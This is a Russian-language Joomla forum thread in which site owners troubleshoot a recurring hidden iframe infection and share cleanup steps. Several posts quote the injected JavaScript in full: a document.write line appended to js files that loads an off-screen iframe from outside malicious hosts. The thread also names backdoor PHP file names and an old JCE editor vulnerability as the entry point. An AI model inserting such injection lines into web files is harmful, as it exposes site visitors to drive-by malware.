Вирус Iframe на сайте (динамический)! - Безопасность сайтов на Joomla

НА сайт попал вирус iframe.никак не получается его удалить.по ssh не помогает.удаление файлов тоже бестолку.помогает откат на старый бэкап но через 20 минут вирус снова появляется на сайте ?что это может быть.помогите пожалуйста !
вот сайт pgkronos.ru
слева видно что там iframe сидит.анализ на вирусы онлайн говорит что все нормально ?как удалить эту гадость ?
пробовал закачивать файлы в другой каталог, но вирус все равно появляется.не пойму почему так происходит.

слева видно что там iframe

- в исходном коде нет тега iframe

нет.нету

ща опять откатил сайт на позавчера.пока нету iframe, но думаю появится скоро опять

опять появился( да что такое.зайдите и гляньте слева хрень торчит.не понимаю откуда и как она появляется
pgkronos.ru

вот здесь отчетливо видно что iframe сидит !!
http://pgkronos.ru/calcmet.html

еще раз нет здесь iframe
если вам не нравится  распродажа ламината, то отключите(удалите) модуль mod_moopopup

гляньте еще раз вот сюда http://pgkronos.ru/calcmet.html
это что слева ?

Да тут есть iframe, в firebuge видно, у меня тоже на сайтах такая появилась ерунда, руками меняю, не знаю появится ли снова.

<iframe width="55" height="55" src="http://rsbxruoe.qhigh.com/f5157507833bf9966387f6ce0dbd6f99.pip?11" style="width:100px;height:100px;position:absolute;left:-100px;top:0;">

а как его убрать ?он нигде не виден вообще.когда файлы заменяю все равно остается.при откате он исщезает, но потом опять появляется ?как его убрать на совсем ?

У меня тоже такой Iframe, причем Яндекс его достаточно долгое время не замечает.

Как этот код заносят в сайт, кто знает?

Как этот код заносят в сайт, кто знает?

когда ручками
когда автоматически

Вирус Iframe на сайте (динамический)!

Заражение, предположительно, происходит через уязвимость в Joomla Content Editor (JCE), которая существует в старых версиях редактора.
В папку ../images/stories загружаются php-файлы .cache_3htt6u.php, bannerDOCs.php, Urss.php, story.php  (названия могут меняться). Кроме этого во всех папках первого уровня (components, modules и.т.д) и во всех папках директории images создаются файлы index.php. Также в конец всех js-файлов прописывается подобный код:

Заражение, предположительно, происходит через уязвимость в Joomla Content Editor (JCE), которая существует в старых версиях редактора.
В папку ../images/stories загружаются php-файлы .cache_3htt6u.php, bannerDOCs.php, Urss.php, story.php  (названия могут меняться). Кроме этого во всех папках первого уровня (components, modules и.т.д) и во всех папках директории images создаются файлы index.php. Также в конец всех js-файлов прописывается подобный код:

Код

;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://xcyca.pcanywhere.net/geowgjwiehgwvbb.cfg?11"></iframe>');

Подтверждаю. Но как лечить??

Сначала найдите всех пхп-шных вредителей, их в подпапках /images/stories ПОЛНО. Удалите. А потом уже удаляйте код из js

Уважаемые.. выловил во все js файлы дописку в конце вида:
;document.write('<iframe style="position:fixed;top:0px;left:-500px;" src="http://ccmxaqt.qhigh.com/3f9b0edf4abf8.try?11" height="350" width="250"></iframe>');

причем ссылка в вредоносном коде рендомно меняется после удаления, т.е убиваю код - через какое то время появляется тоже самое только вместо ccmxaqt.qhigh.com какая нибудь другая ссылка стоит, например так:

;document.write('<iframe style="position:fixed;top:0px;left:-500px;" src="http://cfd.erggaut.com/3f9b0edf4abf8.try?11" height="350" width="250"></iframe>');
==================================================================
нашел сие действо, убил. пришлось ручками все js файлы перелопатить.
при этом: убил ftp клиент полностью, поставил другой, запретил браузеру и ftp клиенту запоминать пароли для входа на хостинг/биллинг/фтп/админку.
+ скачал двиг себе, проверил др.веб лиценз антивирем - ничего не найдено.
+ сменил пароли на хостинг/биллинг/фтп/админку
+ в папке images и подпапках убил все php файлы типа .cache_7qiw7z.php  .cache_08trrt.php
+ ПРОЧИТАВ ЭТОТ ТОПИК ОБНОВИЛ JCE до последней на сегодняшний день версии 2.3.1 а то действительно стоял старой достаточно версии..

на следующий день такая же фигня - все дописки вредоносного кода на месте, как и не делал я чего...
как бороться?

сайтов проблемных - 3 шт. в разных аккаунтах хостинга находятся они, в один сайт не заходил с полгода, вообще он не мой а моего знакомого, я просто делал его... Один сайт на Joomla 2.5.8 и еще 2 сайта на Joomla 1.5.26

попросил хостера посмотреть есть ли в бекаппе недельной давности вредоносные коды. их там не было. восстановили бекапп - сутки все было ок, даже Google выкинул сайт из проблемных.

сегодня с утра все снова.. все вредоносные коды на своих местах как и не делалось ничего.. А так же на месте ВСЕ убитые мной файлы типа .cache_7qiw7z.php  .cache_08trrt.php ! они то откуда взялись)

смотрите логи, там ответ на вопрос

сегодня с утра все снова.. все вредоносные коды на своих местах как и не делалось ничего.. А так же на месте ВСЕ убитые мной файлы типа .cache_7qiw7z.php  .cache_08trrt.php ! они то откуда взялись)

Убил все файлы в images/stories и вылечил шаблон.все заработало.проблема была в файлах все таки действительно.код не появляется больше.спасибо
только код остался в модуле одном, но это не проблема.хотя бы на сайте его нету уже)

Блин та же напасть. В конце js файлов прописывается <iframe style="position:fixed;top:0px;left:-550px;" src="http://********.info/332ca2b582e5923102f5d4586.JxV9bSY4zuNm?default" height="110" width="110"></iframe>. Думал проблема с одним сайтом. Посмотрел другие свои сайты на хостинге. У всех есть эта хрень. В папках images/stories никаких подозрительных PHP файлов не обнаружил. также нет PHP файлов в папках первого уровня (components, modules и.т.д). Редактор JCE раньше был установлен, но снес его с неделю назад. Также был деинсталирован подозрительный Advanced Module Manager. Версия Joomla 1.5.26

В логах нашел обращение к файлу со странным названием .zfgful.php. Он лежит в папка components/com_content. Joomla 2.5.8. Этот сайт у меня основной на аккаунте. И на нем был установлен JCE и Advanced Module Manager. Могу выложить содержимое PHP файла для ознакомления.

Точно такая же проблема. В папке images нет файлов php, хостер тоже пока молчит. В админке меню парализовано, у кого также? Откликнитесь, напишите как избавились от заразы.

@GWork
смотрите *.js *.php файлы, меню "парализует" в основном когда в них вставлен сторонний код если конечно вас ломали, и о чему все читаю и думают про волшебную кнопку нет такого и не обязаны файлы shell лежать именно в папке images, у вас что только одна папка, их могут засунуть куда угодно

@GWork
спросите там у разработчика

обсуждение переносим в топик
http://joomlaforum.ru/index.php/topic,246899.new.html